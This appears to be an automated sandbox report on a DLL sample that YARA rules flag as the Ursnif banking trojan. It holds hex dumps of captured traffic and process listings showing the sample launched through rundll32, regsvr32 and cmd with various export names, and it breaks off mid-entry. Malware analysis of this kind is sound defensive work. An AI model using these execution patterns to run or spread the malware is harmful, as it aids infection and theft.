                                                2021-09-10 09:28:24 UTC97INData Raw: dc 73 ad ba 89 09 93 b8 8b 6c 5f b4 e1 83 a2 e6 08 60 ad b0 22 32 28 8c 36 4b d0 65 7b 15 60 49 73 0b 6c 32 3e e6 0a 64 a3 7a 93 e1 cc 47 2a 75 ee 72 64 5f 45 3b 90 18 9f df 2b 2a 4a 67 51 fb 3d 6f 1e 31 30 31 26 7f 20 10 e9 87 ac 2d 31 7e c6 ba dd a7 29 82 da 6e 4c c9 57 20 99 4a a1 9d 98 70 e2 66 83 64 4c d6 a3 7d e2 47 7b 4b 26 77 1a 5a 81 d6 14 b3 9c 9d 82 86 1c c8 9d b1 9d 49 03 57 d0 ca 59 cc 04 01 e5 6b 7e 56 31 b2 fa ec 4f ab 1a f2 a2 0d a6 e0 c8 d0 68 c9 bb e2 d9 05 c1 4c 04 c4 6a 3f e2 37 1c ed da 23 8a 85 7e 8f 80 00 b0 69 ec 2b c1 ce e7 8d 37 04 c9 13 83 bb ea 77 7d 88 6d 9c ab ca 65 d2 a5 22 06 58 c4 33 5b fa 80 82 08 25 9b b6 33 33 12 64 73 12 51 c8 fc 07 51 c4 76 80 82 9e 54 4b 46 1e f0 07 c0 b4 8b 9f 88 4c 47 4b e1 1b 98 f5 d1 82 8b aa ea
                                                Data Ascii: sl_`"2(6Ke{`Isl2>dzG*urd_E;+*JgQ=o101& -1~)nLW JpfdL}G{K&wZIWYk~V1OhLj?7#~i+7w}me"X3[%33dsQQvTKFLGK
                                                2021-09-10 09:28:24 UTC98INData Raw: 9b 50 a2 88 af 8c b1 61 4a 27 21 f6 2b e4 52 90 b7 0e 09 45 99 61 1d 5a a9 9f eb ca 52 a9 1a a3 5c 9a 4d 7c 42 54 c8 f9 59 61 a5 6f aa 5b 6b c8 70 93 8b b2 d3 f4 cc 09 14 4f 36 3b 82 ed da 24 61 73 65 0b 60 c4 31 24 bb 6f 9c 94 fb 9d 67 fe a5 99 3a ab 27 36 ed f6 59 4d 8b 10 75 e9 5c eb 68 9b 44 2d aa 7a 4d a2 9c 7b 4d bb 94 d2 b8 76 4a c2 72 35 15 8a 92 6d 54 c8 19 5b b1 6a ab d4 b4 5c a3 46 6a 35 f5 5e af fa 5a d3 f2 4b e7 d7 7f bc 71 f6 9d 90 85 b9 b6 b8 cb 05 0f ed 4e db b2 74 ad b6 ba 67 28 cc 8a 91 72 d9 65 2c 7b aa dc 0b 95 a5 cb 0c 75 aa ac ad 46 9a da dc bd 16 ae d9 25 58 db 60 29 53 2d c9 a2 bb cb 23 72 f2 31 37 71 cf 9a 8f ce 62 1f 86 72 7d dc ef 1a 89 05 d5 67 b9 ab 99 0a 4c 60 41 d7 96 11 d0 b3 49 9d f9 d1 04 c9 16 b2 28 19 b0 0d 9c c6 95 5a
                                                Data Ascii: PaJ'!+REaZR\M|BTYao[kpO6;$ase`1$og:'6YMu\hD-zM{MvJr5mT[j\Fj5^ZKqNtg(re,{uF%X`)S-#r17qbr}gL`AI(Z
                                                2021-09-10 09:28:24 UTC101INData Raw: 51 61 ff da 00 08 01 02 01 01 3f 00 8d a4 b3 74 39 16 cd 98 e4 db c2 2e 90 dd 89 08 43 e1 32 4f d1 e2 23 62 57 4c 6d 2c 24 51 f2 2c b7 8b e7 09 31 f0 5f a4 e3 68 68 78 62 17 68 ba 2f 36 5e 25 56 35 fc 1a 3f 62 42 3c f0 5f 26 b2 74 cd e3 74 9d 97 84 e8 52 2e 91 39 26 d8 9f 04 b2 8f b5 f5 3c d2 d9 3a 3e bf d7 5f 02 6d cb 69 31 76 39 16 6c 39 9d b2 e8 6c 78 b1 d3 35 48 63 42 88 a3 c9 58 93 b6 5b 11 62 11 27 43 e4 6d 09 89 92 18 fb 16 2f 9c 26 a8 93 e7 0e 4c dd 9b d0 9d 8c 6b 0f d9 f6 46 24 88 e1 e1 fa 24 34 ac 4b 91 b1 b2 3d 62 8a e0 78 a1 b1 0f 0d d9 56 2e 30 86 49 56 1b 10 c5 64 9e 50 ec 56 32 ec 92 3a 42 e7 91 f3 87 ea 8e d1 54 89 72 c6 23 9b 2d 1e 4b 66 df ea 37 46 e8 f2 2f e9 e4 47 99 21 fc d6 a8 dd 31 91 c3 7e b7 e8 9d 31 32 2f 0c d4 eb f0 5b 44 66 6e
                                                Data Ascii: Qa?t9.C2O#bWLm,$Q,1_hhxbh/6^%V5?bB<_&ttR.9&<:>_mi1v9l9lx5HcBX[b'Cm/&LkF$$4K=bxV.0IVdPV2:BTr#-Kf7F/G!1~12/[Dfn
                                                2021-09-10 09:28:24 UTC102INData Raw: 12 4c 74 de f5 34 49 6c 60 46 c0 3a 13 f3 f8 64 ac 04 00 8d 11 d4 fe d4 c6 f1 52 00 82 00 ee 1a 7a b4 7b d5 94 d8 e5 5c d5 dc 6e 04 82 49 3e 4e 80 ab a5 72 e5 01 99 bf 89 a6 d4 ed b6 7e 6a db 03 da 62 b4 64 3d b2 44 46 b7 06 98 5a 2b 2d 1f 66 2f 3f aa 7c 44 1a 70 0b 96 c4 f6 9f e7 fd 14 29 81 0d 91 81 0d a8 34 3a b9 93 10 31 10 00 22 b4 ac 46 da 75 89 12 67 ad 42 97 0d 31 f7 08 d1 a8 5c 81 d8 8c 88 9d d0 ce 72 b9 1d 24 f6 ad 00 4d 6c 0a 13 10 07 b9 a1 0c 23 e7 c5 4a f0 d6 d4 aa 08 31 3a 80 a3 c7 53 3a a3 70 92 6c 5b be 47 52 c7 a2 9e 92 68 7a fc 19 ba a5 58 90 03 59 30 7f 83 4c 6d 8b 0e 03 44 28 21 0f dd d7 44 f7 af e9 1c 45 bb d6 1b ff 00 a8 fa 46 d9 43 71 02 25 cb 41 14 41 58 a4 36 7f a4 f0 9e a7 11 d9 ee 61 0f 82 a8 ee 13 74 6e b2 28 7b 32 58 a9 61 00
                                                Data Ascii: Lt4Il`F:dRz{\nI>Nr~jbd=DFZ+-f/?|Dp)4:1"FugB1\r$Ml#J1:S:pl[GRhzXY0LmD(!DEFCq%AAX6atn({2Xa
                                                2021-09-10 09:28:24 UTC105INData Raw: d3 7a 4a 1e 5c f5 3e f1 d8 0a b9 cc 55 6d 80 a0 b3 ff 00 b5 64 c9 e9 d0 0a b8 4d bd db ca 60 96 d6 88 12 63 29 d0 8a 1c cc 49 25 8b 13 3f 35 88 99 04 e8 95 ff 00 76 26 92 d9 ff 00 79 40 ef f0 0b a9 01 69 7a 03 d7 cd 28 25 89 35 1d a4 52 96 d0 83 aa 91 a3 af a4 bf 55 8e a3 b5 63 61 03 35 c1 6c c3 32 ce f2 6f 04 9d d2 5c 8d b5 cb 8e 60 91 03 40 76 a2 80 3b 2b 12 18 02 41 93 19 76 13 44 3e 31 03 5d 3a 56 c9 eb 4a fa 89 60 27 f9 a1 f0 a6 8c cd 1f a7 8a f9 a6 54 0a 47 41 93 7b b1 a0 44 ae a3 94 15 1a 1a a7 5b 28 a5 2d e5 0c ec 7a c0 99 82 4d 4b 06 83 8b 96 0b 1f a4 4c c0 f8 a0 90 da 03 47 f6 15 80 c7 a8 f6 ea 40 35 ea dc 7f fc cc 01 53 06 01 63 56 ec a9 00 96 65 62 23 cd 58 be 50 10 21 f1 63 f0 29 ec dc 53 b0 e2 24 d6 42 36 bd 8e 34 88 ff 00 ec 8a cd 31 10 c2
                                                Data Ascii: zJ\>UmdM`c)I%?5v&y@iz(%5RUca5l2o\`@v;+AvD>1]:VJ`'TGA{D[(-zMKLG@5ScVeb#XP!c)S$B641
                                                2021-09-10 09:28:24 UTC108INData Raw: 53 e2 bd 35 89 97 2a 4b 15 30 18 80 62 9b 99 57 36 75 45 26 06 8a 11 1a a1 67 d3 49 09 76 cd d4 7b be af 40 23 97 de 7b 54 62 c5 4b 03 d0 83 d8 f4 26 83 12 0c 2a 12 c3 fd bb 98 fd ab 3f 4c e4 ac b9 66 11 94 80 d9 5a 04 c9 9d d0 0e 63 15 ef 88 d4 fe 12 31 52 d5 bf 48 7f 22 04 57 db b8 3e c6 28 02 a4 82 46 fa 50 3a 35 93 b1 d0 5e fe d4 17 d2 e4 c8 e8 b2 39 eb ff 00 89 eb ec 68 16 45 23 10 19 8f 79 13 11 34 e1 5a 03 21 fb 1a 3d 8c c4 f7 ac 4e c9 b6 18 a8 52 7c 41 34 f6 6f 41 0d 71 9b 46 74 25 bd be 29 8e 2b 90 65 30 2b 71 03 f7 af bb 5b 33 4f 16 c8 09 f9 65 b2 23 63 b8 8a 21 2d 80 0b 13 8c 93 45 de e1 5f cb b3 cb 88 eb 2c 42 6f 53 ef 4b 74 42 90 a6 da ca 31 d7 52 c4 cf 78 8a 24 2b 17 c7 12 a3 2e f4 6d 5d 5c 89 33 8c 40 06 44 78 ec 68 6c f3 29 5c f6 09 89 3b
                                                Data Ascii: S5*K0bW6uE&gIv{@#{TbK&*?LfZc1RH"W>(FP:5^9hE#y4Z!=NR|A4oAqFt%)+e0+q[3Oe#c!-E_,BoSKtB1Rx$+.m]\3@Dxhl)\;
                                                2021-09-10 09:28:24 UTC110INData Raw: 6c 5b 17 78 85 62 76 17 20 d8 f9 93 ba 1e 9a fa 97 6f e6 45 b2 de 03 b0 9d 9e 58 02 26 9e c7 11 71 4b 5c 08 25 9f 25 d0 c8 ce 28 26 74 c0 47 7a 36 6c 1b 61 1a c9 25 ee 3e a4 10 4c 02 3b 98 10 29 8a ce b5 56 94 c0 71 75 25 d1 59 7b b4 01 1a ab 8d a8 41 6d 01 56 f5 0c 16 21 06 87 79 ab bc 45 cb 2c ca c8 96 c2 a3 33 09 32 86 73 31 e0 d5 d2 04 ae 7e 8e 28 a4 1d 2a 76 ae 24 3a 49 56 7f ca 0c c0 48 9c 18 06 06 20 c8 ab d6 51 2d 12 5c 10 1d 59 5b 10 02 88 5d c7 50 6a d1 24 12 89 90 c9 d9 47 93 a0 c2 66 b8 81 60 3a a2 60 9c f7 95 92 46 05 4b 6c 1e e6 b8 e6 e1 45 a4 75 1c 67 e7 e4 dd c8 86 9d 55 ff 00 44 5f 80 e8 31 b6 72 32 0e 37 37 80 9a e1 6f 26 12 cb 6a 10 a4 e8 19 88 24 8a 54 5b 6c 42 74 51 01 67 66 20 49 81 34 96 6d 32 4d c7 7b 85 d8 b4 68 12 d2 ab 35 c5 e0
                                                Data Ascii: l[xbv oEX&qK\%%(&tGz6la%>L;)Vqu%Y{AmV!yE,32s1~(*v$:IVH Q-\Y[]Pj$Gf`:`FKlEugUD_1r277o&j$T[lBtQgf I4m2M{h5
                                                2021-09-10 09:28:24 UTC121INData Raw: bc e9 e9 db bb 72 e4 00 5b d3 30 1a 47 5a e2 4a b9 8b ec 96 73 74 11 0a 4a dc 20 b9 2d a8 13 5c 45 ab b7 96 d9 4f ee 4a a2 00 d2 a4 14 49 cd 97 fd b5 c2 71 df f7 2e ff 00 75 72 c9 b6 72 73 2c 98 24 72 20 8c 4c cd 71 2a 6f b0 6b fc 32 de 64 b3 70 85 11 36 c6 c2 ad 5e e1 12 cd 81 9a 70 b7 5a 2e db 23 0c 2e 01 94 c9 6d 4e e9 b8 6b 4f 28 9c 2f f7 10 c4 a0 91 0b 91 d1 89 34 05 e0 a8 5e d5 f6 40 af 1f 6a 84 83 20 4c 52 25 8f 40 ab 95 50 0f f7 0b b9 68 e8 31 6d 03 4f c4 f1 3c 35 ee 5b 6a 17 17 94 67 45 4c 34 08 3a a6 b4 b9 00 9c 35 d7 53 88 51 9b 5b 31 d0 e5 d4 53 d8 b0 25 52 da 48 04 86 c8 cf 82 c4 73 1a 57 95 0e 4a 40 72 de fe 75 3f 00 d5 c1 21 93 9d 82 89 2a 42 cc c8 8d 99 a0 b6 43 ca ca 06 1a a1 74 28 e5 2a d1 f7 6f 71 de ad 23 85 fc db 76 e0 d9 12 0f 46 70
                                                Data Ascii: r[0GZJstJ -\EOJIq.urrs,$r Lq*ok2dp6^pZ.#.mNkO(/4^@j LR%@Ph1mO<5[jgEL4:5SQ[1S%RHsWJ@ru?!*BCt(*oq#vFp


                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: loaddll32.exe PID: 1132 Parent PID: 6080

                                                General

                                                Start time:11:28:11
                                                Start date:10/09/2021
                                                Path:C:\Windows\System32\loaddll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:loaddll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll'
                                                Imagebase:0xed0000
                                                File size:116736 bytes
                                                MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468105899.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468188061.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.649016082.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.647248023.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468218845.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468255149.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468276277.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468293136.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468154438.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.468055904.0000000003008000.00000004.00000040.sdmp, Author: Joe Security
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: cmd.exe PID: 3560 Parent PID: 1132

                                                General

                                                Start time:11:28:11
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                                                Imagebase:0x150000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: regsvr32.exe PID: 3528 Parent PID: 1132

                                                General

                                                Start time:11:28:12
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                Wow64 process (32bit):true
                                                Commandline:regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll
                                                Imagebase:0x1100000
                                                File size:20992 bytes
                                                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.646505839.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375358568.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375444270.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375275190.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375222083.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375580970.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.648129313.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375181159.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375508831.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375609486.00000000010A8000.00000004.00000040.sdmp, Author: Joe Security
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 572 Parent PID: 3560

                                                General

                                                Start time:11:28:12
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364222279.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364616223.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.651754848.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364320937.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364389953.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364453388.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.644375086.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364561415.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.645252474.0000000000EE0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364525253.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.364645701.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: iexplore.exe PID: 5080 Parent PID: 1132

                                                General

                                                Start time:11:28:12
                                                Start date:10/09/2021
                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                Imagebase:0x7ff724010000
                                                File size:823560 bytes
                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 2200 Parent PID: 1132

                                                General

                                                Start time:11:28:12
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Aquatically
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.290124643.0000000000D40000.00000040.00000001.sdmp, Author: Joe Security
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: iexplore.exe PID: 4536 Parent PID: 5080

                                                General

                                                Start time:11:28:13
                                                Start date:10/09/2021
                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17410 /prefetch:2
                                                Imagebase:0x1110000
                                                File size:822536 bytes
                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 4620 Parent PID: 1132

                                                General

                                                Start time:11:28:16
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Episodically
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000007.00000002.298453588.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 6272 Parent PID: 1132

                                                General

                                                Start time:11:28:20
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Kakapo
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000009.00000002.304746856.0000000000ED0000.00000040.00000001.sdmp, Author: Joe Security

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 6420 Parent PID: 1132

                                                General

                                                Start time:11:28:23
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Overdistantness
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000002.333121153.0000000006AF8000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000A.00000002.330683030.0000000000A90000.00000040.00000001.sdmp, Author: Joe Security

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 6532 Parent PID: 1132

                                                General

                                                Start time:11:28:28
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Pseudopodal
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000C.00000002.325365679.0000000003380000.00000040.00000001.sdmp, Author: Joe Security

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 6832 Parent PID: 1132

                                                General

                                                Start time:11:28:32
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Microphage
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000011.00000002.346644009.0000000000E90000.00000040.00000001.sdmp, Author: Joe Security

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 7040 Parent PID: 1132

                                                General

                                                Start time:11:28:35
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Cytost
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000014.00000002.342607248.00000000033C0000.00000040.00000001.sdmp, Author: Joe Security

                                                Chronological Activities

                                                Analysis Process: iexplore.exe PID: 4684 Parent PID: 5080

                                                General

                                                Start time:11:28:38
                                                Start date:10/09/2021
                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17428 /prefetch:2
                                                Imagebase:0x1110000
                                                File size:822536 bytes
                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 6284 Parent PID: 1132

                                                General

                                                Start time:11:28:38
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Reattach
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000002.358824695.0000000000A10000.00000040.00000001.sdmp, Author: Joe Security

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 768 Parent PID: 1132

                                                General

                                                Start time:11:28:42
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Vigia
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001A.00000002.369842357.0000000004420000.00000040.00000001.sdmp, Author: Joe Security

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 1268 Parent PID: 1132

                                                General

                                                Start time:11:28:45
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Preallable
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001B.00000002.365645310.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 6568 Parent PID: 1132

                                                General

                                                Start time:11:28:49
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Amphistomous
                                                Imagebase:0xef0000
                                                File size:61952 bytes
